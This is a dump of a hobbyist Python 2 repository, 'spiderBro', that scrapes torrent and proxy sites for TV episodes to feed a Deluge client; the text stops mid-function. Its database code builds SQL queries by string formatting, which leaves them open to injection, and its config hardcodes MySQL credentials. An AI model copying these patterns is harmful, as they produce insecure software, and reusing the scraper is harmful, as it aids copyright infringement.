"detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "INI", "length_bytes": 299, "license_type": "no_license", "max_line_length": 54, "num_lines": 13, "path": "/config.ini", "repo_name": "GrahamOMalley/spiderBro", "src_encoding": "UTF-8", "text": "[spiderbro]\ndb_file: /home/gom/code/python/spider_bro/spiderbro.db\nforce_learn: False\nlog_dir: /home/gom/log/spiderbro\nscan_all_shows_xbmc: True\ntv_dir: /media/nasGom/.torrents_temp/\nxbmc_sqlite_db: test.db\nfilerenamer: True\nmysql: True\nhost: localhost\nuser: xbmc\npwd: xbmc\nschema: MyVideos78\n" }, { "alpha_fraction": 0.6060941815376282, "alphanum_fraction": 0.6382271647453308, "avg_line_length": 40.022727966308594, "blob_id": "dfe3d4a0d7a8e21bbbff025739f9b9b914cf880e", "content_id": "9dd79f9a4c96d89f09e00ec30e3423174d94ee16", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1805, "license_type": "no_license", "max_line_length": 116, "num_lines": 44, "path": "/testdriver.py", "repo_name": "GrahamOMalley/spiderBro", "src_encoding": "UTF-8", "text": "#! /usr/bin/env python\n#from sb_utils import *\nimport sys\nimport urllib2\n\nif __name__ == \"__main__\":\n \"\"\"\n quick little testing script to see behaviour of search classes and test individual episodes/seasons\n \"\"\"\n# e_masks = [NxN, sNeN, NNN]\n# s_masks = [season, series]\n# search_list = [piratebaysearch, btjunkiesearch, isohuntsearch]\n# tags = [\"SWESUB\", \"SPANISH\"]\n# opts = {\"use_debug_logging\":True, \"log_dir\":\"log\"}\n\n #log = get_sb_log(opts)\n\n #base = base_search()\n #base.search(\"Game of Thrones\", \"1\", \"3\", sNeN, tags, True)\n \n #p = piratebaysearch()\n #result = p.search(\"Girls\", \"2\", \"2\", sNeN, tags, True)\n #if result: log.info(\"\\t\\tFound Torrent: %s\" % result)\n\n #i = isohuntsearch()\n #result = i.search(\"The Office (US)\", \"8\", \"17\", sNeN, tags, False)\n #print e.search_url\n #if result: log.info(\"\\t\\tFound Torrent: %s\" % result)\n \n #e = extratorrentsearch()\n #result = e.search(\"The Office (US)\", \"8\", \"17\", sNeN, tags, False)\n #print e.search_url #if result: log.info(\"\\t\\tFound Torrent: %s\" % result)\n\n #proxy_support = urllib2.ProxyHandler({})\n #opener = urllib2.build_opener(proxy_support)\n #urllib2.install_opener(opener)\n #response = urllib2.urlopen(\"http://extratorrent.cc/search/?search=downton+abbey&new=1&x=0&y=0\")\n request = urllib2.Request(\"https://kickass.unblocked.pw/usearch/marvels%20agents%20of%20S.H.I.E.L.D.%20s02e10/\")\n request.add_header('Accept', 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8')\n request.add_header('User-Agent', \"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0\")\n request.add_header('Accept-Language', \"en-US,en;q=0.5\")\n response = urllib2.urlopen(request)\n search_page = response.read()\n print search_page\n" }, { "alpha_fraction": 0.5199472904205322, "alphanum_fraction": 0.523421585559845, "avg_line_length": 40.31683349609375, "blob_id": "3c3a47cd83d5f24b2198fd087170d5795d9bb30c", "content_id": "66058be802890c983acd0c26accea030fd23b03d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8347, "license_type": "no_license", "max_line_length": 194, "num_lines": 202, "path": "/db_manager.py", "repo_name": "GrahamOMalley/spiderBro", "src_encoding": "UTF-8", "text": "#! 
/usr/bin/env python\nimport MySQLdb\nimport logging\nimport os\nimport sqlite3\nimport sys\n\nclass db_manager:\n \"\"\" A python singleton \"\"\"\n class __impl:\n \"\"\" Implementation of the singleton interface \"\"\"\n def __init__(self):\n \"\"\" Base Constructor\"\"\"\n self.log = logging.getLogger('spiderbro')\n\n self.sb_db_file = \"\"\n self.CREATE_SB_SCHEMA = False\n self.SB_DB_INITIALIZED = False\n \n self.XBMC_DB_INITIALIZED = False\n\n self.mysqlparms = {}\n self.USING_MYSQL = False\n\n self.xbmc_sqlite_file = \"\"\n self.log.info(\"DB Manager Initialized\")\n\n # setup internal sqlite db\n def init_sb_db(self, filename):\n \"\"\" Create internal sqlite db if it does not already exist\"\"\"\n\n self.sb_db_file = filename\n self.CREATE_SB_SCHEMA = not os.path.exists(self.sb_db_file)\n\n if self.CREATE_SB_SCHEMA:\n conn = sqlite3.connect(self.sb_db_file)\n self.log.debug('Internal db does not exist, Creating Schema...')\n conn.execute(\"\"\"create table if not exists shows (series_id INT PRIMARY KEY, showname TEXT unique, finished INT default 0, is_anime INT default 0, high_quality INT default 0)\"\"\")\n conn.execute(\"\"\"create table if not exists urls_seen (showname TEXT, season INT, episode INT, url TEXT, savepath TEXT)\"\"\")\n conn.close()\n else:\n self.log.debug('Database exists, assume schema does, too.')\n \n self.SB_DB_INITIALIZED = True\n \n # get a connection to the internal db\n def sb_db_get_conn(self):\n try:\n if self.SB_DB_INITIALIZED:\n conn = sqlite3.connect(self.sb_db_file)\n return conn\n else:\n self.log.error(\"Cannot execute, sb_db not initialized\")\n return None\n except Exception, e:\n self.log.error(\"SQLite Error: %s\" % e)\n\n # perform an insert/update/etc\n def sb_db_set(self, stat):\n try:\n if self.SB_DB_INITIALIZED:\n con = sqlite3.connect(self.sb_db_file)\n con.execute(stat)\n con.commit()\n con.close()\n #self.log.debug(\"\\tDATABASE: %s\" % stat)\n else:\n self.log.error(\"Cannot execute, sb_db not initialized\")\n except Exception, e:\n self.log.error(\"SQLite Error: %s\" % e)\n\n # wrapper for select queries, since theres about 5-6 of them\n def sb_select(self, cols, tname, whereclause=\"\"):\n list = []\n statement = \"select \" + \", \".join(cols) + \" from \" + tname + whereclause\n #self.log.debug(\"\\tDATABASE: %s\" % statement)\n if self.SB_DB_INITIALIZED:\n conn = sqlite3.connect(self.sb_db_file)\n cur = conn.cursor()\n cur.execute(statement)\n for c in cur:\n list.append(c)\n cur.close()\n conn.close()\n return list\n else:\n self.log.error(\"SB DB has not been initialized\")\n\n def get_show_info(self, sname):\n return self.sb_select([\"series_id\", \"finished\"], \"shows\", \" where showname = \\\"%s\\\"\" % sname)\n\n def get_show_high_quality(self, sname):\n res = self.sb_select([\"high_quality\"], \"shows\", \" where showname = \\\"%s\\\"\" % sname)\n is_hq = False\n if res:\n if res[0][0] == 1: is_hq = True\n return is_hq\n\n def get_ignore_list(self):\n list = self.sb_select([\"showname\"], \"shows\", \" where finished = 1\")\n ret_list = []\n for i in list:\n ret_list.append(i[0])\n return ret_list\n\n def get_eps_from_self(self, sname):\n return self.sb_select([\"season\", \"episode\"], \"urls_seen\", \" where showname = \\\"%s\\\"\" % sname)\n\n def mark_show_finished(self, sname):\n self.sb_db_set(\"\"\"update shows set finished = 1 where showname = \\\"%s\\\" \"\"\" % sname)\n\n def add_show(self, sid, sname, finished):\n self.sb_db_set(\"\"\"insert or replace into shows (series_id, showname, finished) VALUES 
(\\\"%s\\\",\\\"%s\\\",\\\"%s\\\")\"\"\" % (sid,sname,finished))\n\n def add_to_urls_seen(self, sname, s, e, url, savedir):\n self.sb_db_set(\"\"\"insert into urls_seen (showname,season,episode,url,savepath) VALUES (\\\"%s\\\",\\\"%s\\\",\\\"%s\\\",\\\"%s\\\",\\\"%s\\\")\"\"\" % (sname,s,e,url,savedir))\n\n def clear_cache(self, sname):\n self.sb_db_set(\"\"\"delete from urls_seen where showname=\\\"%s\\\"\"\"\" % (sname))\n\n def set_quality(self, sname, qual):\n self.sb_db_set(\"\"\"update shows set high_quality=%d where showname = \\\"%s\\\" \"\"\" % (qual, sname))\n\n def update_series_id(self, sname, id):\n self.sb_db_set(\"\"\"insert or replace into shows (series_id, showname) values (\\\"%s\\\", \\\"%s\\\") \"\"\" % (id, sname))\n\n def xbmc_init_sqlite(self, filename):\n if os.path.exists(filename):\n self.xbmc_sqlite_file = filename\n self.USING_MYSQL = False\n self.XBMC_DB_INITIALIZED = True\n self.log.info(\"Initialized xbmc sqlite db: %s\" % self.xbmc_sqlite_file)\n else:\n self.log.error(\"(FATAL) no xbmc db, exiting...\")\n sys.exit()\n\n def xbmc_init_mysql(self, host, user, passw, schema):\n try:\n # test connection, throw error if not valid\n con = MySQLdb.connect(host, user, passw, schema)\n con.close()\n self.mysqlparms = {\"host\":host, \"user\":user, \"passw\":passw, \"schema\":schema}\n self.USING_MYSQL = True\n self.XBMC_DB_INITIALIZED = True\n self.log.info(\"MySql DB initialized on host: %s for user: %s, using schema: %s\" % (host, user, schema))\n except:\n self.log.error(\"(Fatal) Exception connecting to mysql db, db not initialized\")\n sys.exit()\n \n def xbmc_select(self, query):\n list = []\n try:\n if self.USING_MYSQL:\n con = MySQLdb.connect(self.mysqlparms[\"host\"], self.mysqlparms[\"user\"], self.mysqlparms[\"passw\"], self.mysqlparms[\"schema\"])\n else:\n con = sqlite3.connect(self.xbmc_sqlite_file)\n cur = con.cursor()\n cur.execute(query)\n for c in cur:\n list.append(c)\n cur.close()\n con.close()\n #self.log.debug(\"\\tDATABASE: %s\" % query)\n return list\n \n except Exception, e:\n self.log.error(\"(FATAL) Exception: %s\" % e)\n sys.exit()\n\n def xbmc_get_eps_for_show(self, sname):\n return self.xbmc_select(\"\"\"select c12, c13 from episodeview where strTitle = \\\"%s\\\" order by c12, c13\"\"\" % sname)\n \n def xbmc_get_showlist(self):\n return self.xbmc_select(\"\"\"select distinct strTitle from episodeview order by strTitle\"\"\")\n\n def xbmc_get_series_id(self, sname):\n return self.xbmc_select(\"\"\"select distinct c12 from tvshow where c00 = \\\"%s\\\"\"\"\" %sname)\n\n def get_id(self):\n \"\"\" Test method, return singleton id \"\"\"\n return id(self)\n\n # storage for the instance reference\n __instance = None\n\n def __init__(self):\n \"\"\" Create singleton instance \"\"\"\n # Check whether we already have an instance\n if db_manager.__instance is None:\n # Create and remember instance\n db_manager.__instance = db_manager.__impl()\n\n # Store instance reference as the only member in the handle\n self.__dict__['_db_manager__instance'] = db_manager.__instance\n\n def __getattr__(self, attr):\n \"\"\" Delegate access to implementation \"\"\"\n return getattr(self.__instance, attr)\n\n def __setattr__(self, attr, value):\n \"\"\" Delegate access to implementation \"\"\"\n return setattr(self.__instance, attr, value)\n\n" }, { "alpha_fraction": 0.5560863614082336, "alphanum_fraction": 0.561251163482666, "avg_line_length": 42.81753921508789, "blob_id": "7430086eaf3b64f2acd04a3e2c258b954677d4d1", "content_id": 
"84d1ef30013a29fdd767f41dc7ea1d15e7996139", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 30979, "license_type": "no_license", "max_line_length": 183, "num_lines": 707, "path": "/spiderBroAPI.py", "repo_name": "GrahamOMalley/spiderBro", "src_encoding": "UTF-8", "text": "#! /usr/bin/env python\nimport ConfigParser\nimport argparse\nimport logging\nimport re\nimport string\nimport sys\nimport time\nimport traceback\nimport urllib2\nimport gomXBMCTools\nimport json\n\nfrom BeautifulSoup import BeautifulSoup\nfrom datetime import date\nfrom datetime import datetime\nfrom deluge.log import setupLogger\nfrom deluge.ui.client import client\nfrom twisted.internet import defer\nfrom twisted.internet import reactor\n\nfrom db_manager import db_manager\n\n#####################################################################################\n# Filemasks\n#####################################################################################\n\nclass Season:\n def __init__(self):\n self.descr = \"Season\"\n def mask(self, sn, ep):\n return (\"season %s\" % sn)\n\nclass Series:\n def __init__(self):\n self.descr = \"Series\"\n def mask(self, sn, ep):\n return (\"series %s\" % sn)\n\nclass SNEN:\n def __init__(self):\n self.descr = \"SNEN\"\n def mask(self, sn, ep):\n s = \"s0\" + sn if(int(sn)<10) else \"s\" + sn\n e = \"e0\" + ep if(int(ep)<10) else \"e\" + ep\n return (s+e)\n\nclass NxN:\n def __init__(self):\n self.descr = \"NxN\"\n def mask(self, sn, ep):\n e = \"0\" + ep if(int(ep)<10) else ep\n return (\"%sx%s\" % (sn, e))\n \nclass NNN:\n def __init__(self):\n self.descr = \"NNN\"\n def mask(self, sn, ep):\n e = \"0\" + ep if(int(ep)<10) else ep\n return (\"%s%s\" % (sn, e))\n \n#####################################################################################\n# Searches\n#####################################################################################\nclass BaseSearch:\n def __init__(self):\n self.name = \"Base Search Class\"\n self.delimiter = \" \"\n self.can_get_tor_from_main_page = True\n\n def search(self, series_name, sn, ep, fmask, tags, is_high_qual):\n lg = logging.getLogger('spiderbro')\n series_name = series_name.replace(\"::\", \"\")\n series_name = series_name.replace(\": \", \" \")\n series_name = series_name.replace(\":\", \" \")\n series_name = \"\".join(ch for ch in series_name if ch not in [\"!\", \"'\", \":\"])\n series_name = series_name.replace(\"&\", \"and\")\n m = fmask()\n season_or_ep_str = m.mask(sn, ep)\n ser_list = self.generate_search_terms(series_name)\n is_season = False\n if ep == \"-1\": is_season = True\n for series_search_term in ser_list:\n search_url = self.get_search_url(series_search_term, season_or_ep_str)\n lg.info(\"\\tSearching %s:\\t%s %s \\t\\t(%s)\" % (self.name, series_search_term, season_or_ep_str, search_url))\n try:\n #response = urllib2.urlopen(search_url)\n # TODO: add a headers member to the base search class\n # then have a loop here that builds up the request with the appropriate headers\n # the ones below work for extratorrent, use firefox dev edition to see what headers work on other sites\n request = urllib2.Request(search_url)\n request.add_header('Accept', 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8')\n request.add_header('User-Agent', \"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0\")\n response = urllib2.urlopen(request)\n search_page = response.read()\n sps = BeautifulSoup(search_page)\n links = sps.findAll('a', 
href=re.compile(self.get_links_from_main_page_re()))\n                for l in links:\n                    if self.validate_link(series_search_term, season_or_ep_str, l['href'], tags, is_high_qual, is_season):\n                        if self.validate_page(l['href']):\n                            if self.can_get_tor_from_main_page:\n                                return l['href']\n                            else:\n                                return self.get_torrent_from_validated_page(l['href'])\n            except:\n                lg.error(\"Couldn't open %s\" % search_url)\n                #lg.error(\"Shutting down sb, check that url is accessible\")\n                #sys.exit()\n        return \"\"\n\n    def get_links_from_main_page_re(self):\n        lg = logging.getLogger('spiderbro')\n        lg.debug(\"\\tbase: get links from main page using regexp: ^http\")\n        return \"^http\"\n\n    def get_torrent_from_validated_page(self, page):\n        lg = logging.getLogger('spiderbro')\n        lg.debug(\"base: get torrent from validated page using regexp: \\\"\\\"\")\n        return \"\"\n\n    def validate_link(self, series, s_ep_str, link, tags, is_high_q, is_season):\n        lg = logging.getLogger('spiderbro')\n        # First validate the link title is ok\n        is_torrent = re.compile(self.get_is_link_a_torrent_re())\n        if(not is_torrent.match(link)):\n            return False\n        else:\n            lg.debug('\\t\\tValidating %s' % (gomXBMCTools.getTorrentNameFromMagnetLink(link)))\n        \n        if (is_high_q and not ((\"720p\" in link.lower()) or (\"1080p\" in link.lower()))): \n            lg.debug(\"\\t\\t\\tValidation FAILED: Quality is HighQ but 720p not found in torrent\")\n            return False\n\n        if ( not is_high_q and ((\"720p\" in link.lower()) or (\"1080p\" in link.lower()))): \n            lg.debug(\"\\t\\t\\tValidation FAILED: Quality is lowQ but 720p found in torrent\")\n            return False\n\n        for t in tags:\n            if t.lower() in link.lower(): \n                lg.debug(\"\\t\\t\\tValidation FAILED: tag filter %s found in torrent\" % t)\n                return False\n        \n        if is_season: \n            # we are searching for a torrent of an entire season\n            s_ep_str = s_ep_str.replace(\" \", self.delimiter).lower()\n            if (s_ep_str in link.lower() or (s_ep_str.replace(self.delimiter, self.delimiter+\"0\") in link.lower())):\n                return True\n        else:\n            # we are searching for an episode\n            delims = [self.delimiter, \".\"]\n            for d in delims:\n                if (self.validate_delims(series, s_ep_str, d, link)):\n                    return True\n                else:\n                    lg.debug(\"\\t\\t\\tValidation FAILED: s_ep_str %s or %s not found in link title\" % (s_ep_str, d.join(series.split(\" \")).lower()))\n        \n        return False\n\n    def validate_delims(self, series, s_ep_str, delim, link):\n        if (s_ep_str in link.lower() and delim.join(series.split(\" \")).lower() in link.lower()):\n            return True\n        return False\n\n    # child classes can define their own site-specific page validation, see PirateBaySearch for an example\n    def validate_page(self, tor):\n        lg = logging.getLogger('spiderbro')\n        lg.debug(\"\\tbase: validate page (return true)\")\n        return True\n\n    # break the series name up and try different variations of it \n    # eg: \"Blah & Blah (2010)\" -> [\"Blah & Blah (2010)\", \"Blah & Blah\", \"Blah and Blah (2010)\", \"Blah and Blah\"] etc\n    def generate_search_terms(self, name):\n        regser = re.compile(\" \\([0-9a-zA-Z]{2,4}\\)\").sub('', name)\n        li = [name, regser]\n        \n        hli =[]\n        for l in li:\n            hyphen = \" \".join(l.split(\"-\"))\n            hli.append(hyphen)\n        if hli: li.extend(hli)\n\n        for l in li:\n            hyphen = \" \".join(l.split(\":\"))\n            hli.append(hyphen)\n        if hli: li.extend(hli)\n\n        cli =[]\n        for l in li:\n            comma = \" \".join(l.split(\",\"))\n            cli.append(comma)\n        if cli: li.extend(cli)\n\n\n        ali =[]\n        for l in li:\n            ampersand = \"and\".join(l.split(\"&\"))\n            ali.append(ampersand)\n        if ali: li.extend(ali)\n\n        return list(set(li))\n    \n    def get_search_url(self, name, maskval):\n        return \"www.thisisabaseclassyouidiot.com\"\n\n    def get_is_link_a_torrent_re(self):\n        return \".*torrent$\"\n\n# Child classes need to define self.delimiter, get_search_url and optionally validate_page \nclass PirateBaySearch(BaseSearch):\n    def __init__(self):\n        self.name = \"piratebay\"\n        self.delimiter = \"+\"\n        self.can_get_tor_from_main_page = True\n\n    def get_is_link_a_torrent_re(self):\n        return \"^magnet\"\n\n    def get_links_from_main_page_re(self):\n        lg = logging.getLogger('spiderbro')\n        lg.debug(\"\\tpiratebay: get links from main page using regexp: ^magnet\")\n        return \"^magnet\"\n\n    def get_search_url(self, name, maskval):\n        return \"http://pirateproxy.bz/search/\"+\"+\".join(name.split(\" \")).replace(\"'\",\"\")+\"+\"+\"+\".join(maskval.split(\" \")) + \"/0/7/0\"\n    \n    def validate_page(self, tor):\n        # NOTE: the early return below intentionally disables the seed check that follows\n        return True\n        seeds = 0\n        seeds_reg = re.compile(\"Seeders:</dt>\\n<dd>[0-9]{1,9}\")\n        lg = logging.getLogger('spiderbro')\n        lg.debug(\"\\t\\tDoing piratebay page validation\")\n        turl = tor.replace(\"http://torrents.pirateproxy.bz\", \"http://pirateproxy.bz/torrent\")\n        resp = urllib2.urlopen(turl)\n        html = resp.read()\n        data = BeautifulSoup(html)\n        details = data.findAll(\"dl\", { \"class\" : \"col2\" })\n        # This is ugly as sin, I think beautifulsoup has some problems with <dt> and <dd> tags?\n        for d in details: \n            try:\n                seeds = int(seeds_reg.findall(str(d))[0].replace(\"Seeders:</dt>\\n<dd>\", \"\"))\n            except:\n                lg.error(\"\\t\\tError parsing seeders for piratebay\")\n        if seeds > 0:\n            lg.debug(\"\\t\\tValidation passed, torrent has %s seeds...\" % seeds)\n            return True\n        else:\n            lg.debug(\"\\t\\tValidation FAILED, torrent has no seeds...\")\n            return False\n\nclass KATSearch(BaseSearch):\n    def __init__(self):\n        self.name = \"kickasstorrents\"\n        self.delimiter = \"+\"\n        self.can_get_tor_from_main_page = True\n\n    def get_is_link_a_torrent_re(self):\n        return \"^magnet\"\n\n    def get_links_from_main_page_re(self):\n        return \"^magnet\"\n\n    def get_search_url(self, name, maskval):\n        return \"https://kickass.unblocked.pw/usearch/\" + \" \".join(name.split(\" \")).replace(\"'\",\"\")+\" \"+\" \".join(maskval.split(\" \")) + \"/\"\n\n    def validate_page(self, tor):\n        lg = logging.getLogger('spiderbro')\n        lg.debug(\"\\t\\tDoing KAT page validation for: \"+tor)\n        lg.debug(\"\\t\\tNot Implemented: KAT page validation, returning true\")\n        return True\n\n    def get_torrent_from_validated_page(self, page):\n        lg = logging.getLogger('spiderbro')\n        lg.debug(\"\\t\\tConverting torrent url to kat format : \"+page)\n        return \"http://kickass.unblocked.pw/\" + page.replace(\"torrent_\", \"\")\n    \n    def validate_delims(self, series, s_ep_str, delim, link):\n        series = series.replace(\".\",\"+\")\n        if (s_ep_str in link.lower() and delim.join(series.split(\" \")).lower() in link.lower()):\n            return True\n        return False\n\nclass ExtraTorrentSearch(BaseSearch):\n    def __init__(self):\n        self.name = \"extratorrent\"\n        self.delimiter = \".\"\n        self.can_get_tor_from_main_page = False\n\n    def get_links_from_main_page_re(self):\n        return \".*torrent$\"\n\n    def get_search_url(self, name, maskval):\n        return \"http://extratorrent.cc/search/?search=\" + \"+\".join(name.split(\" \")).replace(\"'\",\"\")+\"+\"+\"+\".join(maskval.split(\" \")) + \"&new=1&x=0&y=0\"\n\n    def validate_page(self, tor):\n        lg = logging.getLogger('spiderbro')\n        lg.debug(\"\\t\\tDoing extratorrent page validation for: \"+tor)\n        lg.debug(\"\\t\\tNot 
Implemented: extratorrent page validation, returning true\")\n return True\n\n def get_torrent_from_validated_page(self, page):\n lg = logging.getLogger('spiderbro')\n lg.debug(\"\\t\\tConverting torrent url to ext format : \"+page)\n return \"http://extratorrent.cc\" + page.replace(\"torrent_\", \"\")\n\nclass IsoHuntSearch(BaseSearch):\n def __init__(self):\n self.name = \"isohunt\"\n self.delimiter = \"+\"\n self.can_get_tor_from_main_page = False\n\n def get_links_from_main_page_re(self):\n return \".*\"\n\n def get_is_link_a_torrent_re(self):\n return \".*tab=summary$\"\n\n def get_search_url(self, name, maskval):\n return \"http://isohunt.com/torrents/\" + \"+\".join(name.split(\" \")).replace(\"'\",\"\")+\"+\"+\"+\".join(maskval.split(\" \")) + \"?iht=-1&ihp=1&ihs1=1&iho1=d\"\n\n def get_torrent_from_validated_page(self, page):\n turl = \"http://www.isohunt.com\" + page\n resp = urllib2.urlopen(turl)\n val_page = resp.read()\n val_tags = BeautifulSoup(val_page)\n links = val_tags.findAll('a', href=re.compile(\"ca.*torrent\"))\n for l in links:\n return string.lower(l['href'])\n return \"\"\n\n def validate_page(self, tor):\n lg = logging.getLogger('spiderbro')\n lg.debug(\"\\t\\tDoing isohunt page validation for: \"+tor)\n lg.debug(\"\\t\\tNot Implemented: isohunt page validation, returning true\")\n return True\n\n\ndef get_configuration():\n \"\"\"\n read the configuration file, set opts\n \"\"\"\n # Set up config file\n conf_parser = argparse.ArgumentParser(add_help=False)\n conf_parser.add_argument(\"--conf_file\", help=\"Specify config file\", metavar=\"FILE\", default=\"/home/gom/code/python/spider_bro/config.ini\")\n args, remaining_argv = conf_parser.parse_known_args()\n defaults = {\"tv_dir\" : \"some default\",}\n if args.conf_file:\n config = ConfigParser.SafeConfigParser()\n config.read([args.conf_file])\n defaults = dict(config.items(\"spiderbro\"))\n\n # Don't surpress add_help here so it will handle -h\n parser = argparse.ArgumentParser(parents=[conf_parser], formatter_class=argparse.RawDescriptionHelpFormatter, description='Spiderbro! Spiderbro! 
Finding episodes for your shows!')\n    parser.add_argument('--test', action=\"store_true\", default=False, help='Don\\'t actually download episodes')\n    parser.add_argument('--debug_logging', action=\"store_true\", default=False, help='Turn on Debug Logging')\n    parser.add_argument('--xbmc_sqlite_db', type=str, required=False, default=\"\", help='XBMC SQLite DB')\n    # NOTE: flags declared with action=\"store_true\" and default=True (--mysql, --all, -f) can only be enabled,\n    # never disabled, from the command line; their effective defaults come from config.ini via set_defaults\n    parser.add_argument('--mysql', action=\"store_true\", default=True, help='Use Mysql DB')\n\n    parser.add_argument('--host', type=str, required=False, default=\"\", help='Mysql host')\n    parser.add_argument('--user', type=str, required=False, default=\"\", help='Mysql user')\n    parser.add_argument('--pwd', type=str, required=False, default=\"\", help='Mysql password')\n    parser.add_argument('--schema', type=str, required=False, default=\"\", help='MySql schema')\n\n    parser.add_argument('-a', '--all', action=\"store_true\", default=True, help='Find episodes for all shows')\n    parser.add_argument('-cc', '--clear_cache', action=\"store_true\", default=False, help='Clear the internal SB episode cache for show(s)')\n    parser.add_argument('-f', '--use_file_renamer', action=\"store_true\", default=True, help='Use the file_renamer script after torrent downloads')\n    parser.add_argument('-hq', '--high_quality', action=\"store_true\", default=False, help='Switch show to high quality')\n    parser.add_argument('-lq', '--low_quality', action=\"store_true\", default=False, help='Switch show to low quality')\n    parser.add_argument('-l', '--force_learn', action=\"store_true\", default=False, help='Force SB to mark episode(s) as downloaded')\n    parser.add_argument('-p', '--polite', action=\"store_true\", default=False, help='Wait N seconds before opening each url')\n    parser.add_argument('-v', '--verbose', action=\"store_true\", default=False, help='Verbose output')\n\n    parser.add_argument('-d', '--db_file', type=str, required=False, default='spiderbro.db', help='Spiderbro internal database file')\n    parser.add_argument('-ld', '--log_dir', type=str, required=False, default=\"log\", help='Logging Dir')\n    parser.add_argument('-pv', '--polite-value', type=int, required=False, default=5, help='Num seconds for polite')\n    parser.add_argument('-s', '--show', type=str, required=False, help='Find episodes for a single show')\n    parser.add_argument('-t', '--tv_dir', type=str, required=False, default='/home/gom/nas/tv/', help='TV directory')\n    parser.add_argument('--force_id', type=str, required=False, help='Force a show to change its id')\n\n    parser.set_defaults(**defaults)\n    args = parser.parse_args(remaining_argv)\n    if args.show: args.all = False\n    return args\n\n#################################################################################################################\n# SpiderBro main class\n#################################################################################################################\nclass SpiderBro:\n    def __init__(self, opts, episode_masks=None, season_masks=None, ignore_taglist=None, site_search_list=None):\n        \"\"\"\n        Set up logger, db_manager, configuration\n        \"\"\"\n        if episode_masks is None: episode_masks = []\n        if season_masks is None: season_masks = []\n        if ignore_taglist is None: ignore_taglist = []\n        if site_search_list is None: site_search_list = []\n        self.episode_masks = episode_masks\n        self.season_masks = season_masks\n        self.ignore_taglist = ignore_taglist\n        self.site_search_list = site_search_list\n\n        self.config = opts\n        self.logger = self.setup_logger()\n        self.db = self.setup_db_manager()\n        self.download_list = []\n\n    def 
setup_logger(self):\n        \"\"\"\n        Set up all the logging parameters for SpiderBro\n        \"\"\"\n        start_day = str(datetime.today()).split(\" \")[0]\n        setupLogger()\n        self.logger = logging.getLogger(\"spiderbro\")\n        if (self.config.debug_logging == True):\n            self.logger.setLevel(logging.DEBUG)\n        else:\n            self.logger.setLevel(logging.INFO)\n        formatter = logging.Formatter('[%(asctime)s] [%(levelname)s] %(message)s')\n        handler_stream = logging.StreamHandler()\n        handler_stream.setFormatter(formatter)\n        handler_stream.setLevel(logging.CRITICAL)\n        self.logger.addHandler(handler_stream)\n        handler_file = logging.FileHandler('%s/spiderBro_%s.log' % (self.config.log_dir, start_day))\n        handler_file.setFormatter(formatter)\n        self.logger.addHandler(handler_file)\n        self.logger.info(\"\")\n        self.logger.info(\"SpiderBro, SpiderBro\")\n        self.logger.info(\"Finding episodes for your shows\")\n        self.log_debug_info()\n        return self.logger\n\n    def log_debug_info(self):\n        \"\"\"\n        Log some debugging info about configuration\n        \"\"\"\n        self.logger.debug(\"\")\n        self.logger.debug(\"Using params:\")\n        dic = vars(self.config)\n        sopts = dic.keys()\n        sopts.sort()\n        for k in sopts:\n            self.logger.debug(\"%s: %s\" % (k, dic[k]))\n        self.logger.debug(\"\")\n\n    def setup_db_manager(self):\n        \"\"\"\n        Set up the db manager based on a dictionary of options supplied by get_configuration\n        \"\"\"\n        db = db_manager()\n\n        if(self.config.db_file):\n            db.init_sb_db(self.config.db_file)\n        else:\n            db.init_sb_db('spiderbro.db')\n\n        if(self.config.mysql):\n            db.xbmc_init_mysql(self.config.host, self.config.user, self.config.pwd, self.config.schema) \n        else: \n            db.xbmc_init_sqlite(self.config.xbmc_sqlite_db) \n\n        if(self.config.clear_cache and self.config.show):\n            self.logger.info(\"Clearing db cache for show %s\" % (self.config.show))\n            db.clear_cache(self.config.show)\n        \n        if(self.config.high_quality and self.config.show):\n            self.logger.info(\"Changing quality to high for show %s\" % (self.config.show))\n            db.set_quality(self.config.show, 1)\n        \n        if(self.config.low_quality and self.config.show):\n            self.logger.info(\"Changing quality to low for show %s\" % (self.config.show))\n            db.set_quality(self.config.show, 0)\n        \n        if(self.config.force_id and self.config.show):\n            self.logger.info(\"Forcing new id %s for show %s\" % (self.config.force_id, self.config.show))\n            db.update_series_id(self.config.show, self.config.force_id)\n        return db\n    \n\n    def get_series_id(self, series_name):\n        \"\"\"\n        Get the tvdb.com series id for a given tv show\n        \"\"\"\n        \n        xbmc_id = self.db.xbmc_get_series_id(series_name)\n        sb_id = self.db.get_show_info(series_name)\n\n        # Edge case can happen here where show in xbmc but not in sb_db, so we make sure it is inserted\n        if(xbmc_id and not sb_id):\n            self.logger.debug(\"No db entry found for show %s, creating default...\" % series_name)\n            self.db.add_show(xbmc_id[0][0], series_name, 0)\n\n        # try to get series id from xbmc db first if force_id not True\n        if(xbmc_id and not ('force_id' in self.config)):\n            self.logger.debug(\"\\t\\tGot series ID from XBMC: %s\" % xbmc_id[0][0])\n            return xbmc_id[0][0]\n\n        # otherwise go to sb_db\n        if sb_id:\n            sid = sb_id[0][0]\n            self.logger.debug(\"\\t\\tGot series ID from Spiderbro Internal DB: %s\" % sid)\n            return sid\n        # finally go to tvdb if all other options exhausted\n        else:\n            try:\n                page = urllib2.urlopen(\"http://thetvdb.com/api/GetSeries.php?seriesname=%s\" % urllib2.quote(series_name))\n                soup = BeautifulSoup(page)\n                sid = int(soup.data.series.seriesid.string)\n                self.logger.debug(\"\\t\\tGot 
